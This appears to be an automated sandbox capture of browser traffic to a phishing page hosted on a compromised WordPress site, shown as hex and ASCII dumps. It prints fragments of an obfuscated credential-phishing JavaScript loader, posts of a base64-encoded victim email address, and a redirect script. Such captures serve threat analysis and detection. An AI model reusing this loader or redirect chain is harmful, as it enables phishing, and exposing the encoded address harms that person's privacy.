                                                                                                      11192.168.2.1649889192.243.110.54438056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:21 UTC493OUTGET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: none
                                                                                                      Sec-Fetch-Mode: cors
                                                                                                      Sec-Fetch-Dest: empty
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:21 UTC389INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/javascript;charset=UTF-8
                                                                                                      content-length: 2069
                                                                                                      date: Wed, 30 Oct 2024 16:13:21 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:21 UTC979INData Raw: 76 61 72 20 69 6e 73 74 61 6e 63 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 69 6e 73 74 61 6e 63 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 69 6e 73 74 61 6e 63 65 29 3b 0d 0a 69 6e 73 74 61 6e 63 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22 65 79 4a 68 49 6a
                                                                                                      Data Ascii: var instance= document.createElement("script");instance.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(instance);instance.onload=function(){var {a,b,c,d} = JSON.parse(atob("eyJhIj
                                                                                                      2024-10-30 16:13:21 UTC1090INData Raw: 5a 6b 4d 54 52 6c 5a 44 42 6b 59 6a 59 30 4f 54 41 34 59 57 56 6d 59 54 67 69 4c 43 4a 69 49 6a 6f 69 5a 6a 46 6d 5a 6d 59 31 4e 6d 51 35 4e 47 55 77 59 54 4a 6b 4e 7a 52 6a 4e 7a 64 68 59 54 49 34 5a 44 67 35 4e 6d 45 78 5a 54 6b 35 59 7a 4d 31 5a 54 4a 68 4e 44 45 7a 4d 57 4a 68 4e 6a 55 34 59 54 49 30 59 6a 55 7a 5a 44 41 78 4e 54 6c 6d 4e 54 51 79 4d 32 4e 68 4f 57 4e 69 4e 6a 42 68 4d 6d 49 35 4f 44 42 6d 5a 44 56 6a 4e 7a 52 6b 4e 7a 67 78 5a 54 6b 78 5a 6a 45 32 5a 6a 4a 6d 4f 47 4d 32 4f 47 49 30 4f 57 5a 6b 59 7a 41 78 59 54 56 6d 5a 57 45 33 4d 6d 45 79 5a 6a 5a 6a 59 54 4a 68 5a 6d 55 78 4e 44 4e 69 4d 54 63 7a 5a 47 49 78 4e 57 59 35 4f 44 68 68 4e 54 59 35 4f 57 55 35 59 6a 59 78 4e 7a 49 34 4e 32 4a 6a 5a 6a 49 31 4d 47 4d 7a 4d 47 49 77 4f
                                                                                                      Data Ascii: ZkMTRlZDBkYjY0OTA4YWVmYTgiLCJiIjoiZjFmZmY1NmQ5NGUwYTJkNzRjNzdhYTI4ZDg5NmExZTk5YzM1ZTJhNDEzMWJhNjU4YTI0YjUzZDAxNTlmNTQyM2NhOWNiNjBhMmI5ODBmZDVjNzRkNzgxZTkxZjE2ZjJmOGM2OGI0OWZkYzAxYTVmZWE3MmEyZjZjYTJhZmUxNDNiMTczZGIxNWY5ODhhNTY5OWU5YjYxNzI4N2JjZjI1MGMzMGIwO


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.1649890192.243.110.54438056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:21 UTC778OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 169
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: null
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:21 UTC169OUTData Raw: 63 6f 64 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 65 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: cod=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&e=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:13:21 UTC384INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 2099
                                                                                                      date: Wed, 30 Oct 2024 16:13:21 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:21 UTC984INData Raw: 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 6d 61 72 67 69 6e 3a 33 30 70 78 3b
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex, nofollow"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style>body,html{margin:30px;
                                                                                                      2024-10-30 16:13:21 UTC1115INData Raw: 2d 64 65 6c 61 79 3a 20 2d 31 34 34 6d 73 3b 7d 2e 61 66 66 65 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 32 70 78 3b 6c 65 66 74 3a 20 34 30 70 78 3b 7d 2e 61 66 66 65 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 31 38 30 6d 73 3b 7d 2e 61 66 66 65 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 31 70 78 3b 6c 65 66 74 3a 20 33 32 70 78 3b 7d 2e 61 66 66 65 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 36 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 32 31 36 6d 73 3b 7d 2e 61 66 66 65 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 36 29 3a 61 66 74 65
                                                                                                      Data Ascii: -delay: -144ms;}.affect div:nth-child(4):after {top: 72px;left: 40px;}.affect div:nth-child(5) {animation-delay: -180ms;}.affect div:nth-child(5):after {top: 71px;left: 32px;}.affect div:nth-child(6) {animation-delay: -216ms;}.affect div:nth-child(6):afte


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.1649891192.243.110.54438056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:21 UTC610OUTGET /favicon.ico HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: image
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:21 UTC434INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1238
                                                                                                      date: Wed, 30 Oct 2024 16:13:21 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:21 UTC934INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s
                                                                                                      2024-10-30 16:13:21 UTC304INData Raw: 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e
                                                                                                      Data Ascii: 5, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over con


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.1649893192.243.110.54438056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:25 UTC857OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 167
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: https://clinicaaryal.com
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:25 UTC167OUTData Raw: 61 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 62 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: a=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&b=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:13:25 UTC383INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 402
                                                                                                      date: Wed, 30 Oct 2024 16:13:25 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:25 UTC402INData Raw: 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 72 2e 67 2e 62 69 6e 67 2e 63 6f 6d 2f 62 61 6d 2f 61 63 3f 21 26 26 75 3d 61 31 61 48 52 30 63 48 4d 36 4c 79 39 79 4c 6d 63 75 59 6d 6c 75 5a 79 35 6a 62 32 30 76 59 6d 46 74 4c 32 46 6a 50 79 45 6d 4a 6e 55 39 59 54 46 68 53 46 49 77 59 30 68 4e 4e 6b 78 35 4f 58 6c 4d 62 57 4e 31 57 57 31 73 64 56 70 35 4e 57 70 69 4d 6a 42 32 57 57 31 47 64 45 77 79 52 6d 70 51 65 55 56 74 53 6d 35 56 4f 56 6c 55 52 6d 68 54 52 6b 6c 33 57 54 42 6f 54 6b 35 72 65 44 56 50 56 33 68 70 55 6a 4a 33 64 31 64 73 5a 47 46 4e 56 30 31 35 59 6b 68 61 61 57 46 55 56 6a 5a 58 56 6b 30 78 59 57 31 4a 65 55 31 49 57 6d 46 53 4d 31 4a 76 56 31 64 30
                                                                                                      Data Ascii: <script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.164995920.12.23.50443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:34 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=m+V8WmbNk+DLE5l&MD=1G1bEnf1 HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                      Host: slscr.update.microsoft.com
                                                                                                      2024-10-30 16:13:34 UTC560INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Expires: -1
                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                      MS-CorrelationId: 94da1ec0-5189-4916-acf1-34c90061418a
                                                                                                      MS-RequestId: 90455c7b-22ac-40f3-8047-2044af5b5048
                                                                                                      MS-CV: 7G7o4FRU5EiXtyYp.0
                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Date: Wed, 30 Oct 2024 16:13:33 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 30005
                                                                                                      2024-10-30 16:13:34 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                      2024-10-30 16:13:34 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.1649979192.243.110.54437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:37 UTC721OUTGET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: script
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:37 UTC389INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/javascript;charset=UTF-8
                                                                                                      content-length: 2077
                                                                                                      date: Wed, 30 Oct 2024 16:13:37 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:37 UTC979INData Raw: 76 61 72 20 70 65 72 63 65 69 76 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 70 65 72 63 65 69 76 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 70 65 72 63 65 69 76 65 29 3b 0d 0a 70 65 72 63 65 69 76 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22 65 79 4a 68 49 6a
                                                                                                      Data Ascii: var perceive= document.createElement("script");perceive.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(perceive);perceive.onload=function(){var {a,b,c,d} = JSON.parse(atob("eyJhIj
                                                                                                      2024-10-30 16:13:37 UTC1098INData Raw: 5a 6a 4e 32 5a 68 4d 44 41 7a 4f 44 45 79 4d 32 59 77 4d 6a 59 30 59 53 49 73 49 6d 49 69 4f 69 49 33 59 54 67 33 59 6a 6b 7a 5a 44 64 6c 59 6d 4d 32 5a 6a 4d 31 59 54 6b 77 4d 54 6c 6d 4d 7a 64 68 4e 7a 42 6b 4d 44 49 34 5a 44 52 6a 4e 7a 63 35 59 7a 49 79 59 7a 4e 6a 4d 44 64 6d 4d 57 4d 79 5a 44 5a 6b 59 57 55 77 5a 6a 4d 78 4d 6d 59 7a 59 6a 6c 68 4f 57 52 6d 4d 6a 4d 33 4d 32 45 78 4e 44 56 6b 59 6a 51 77 4e 6a 63 77 4d 54 6c 6d 4f 54 45 34 4d 47 4a 6b 4e 54 51 33 4d 7a 63 30 4f 44 45 34 4e 44 45 79 59 6d 56 68 5a 44 5a 69 4d 6d 46 6a 59 6a 41 35 4e 57 4a 69 4d 6d 49 7a 4f 54 41 79 4d 44 68 6b 4e 54 45 33 4e 32 51 79 5a 6d 56 6c 4e 6d 52 6c 59 54 4a 68 59 6a 51 77 5a 57 4a 68 5a 54 56 68 4d 54 55 30 4d 57 45 77 59 32 59 77 5a 6a 68 6b 4d 6a 4a 6c 5a
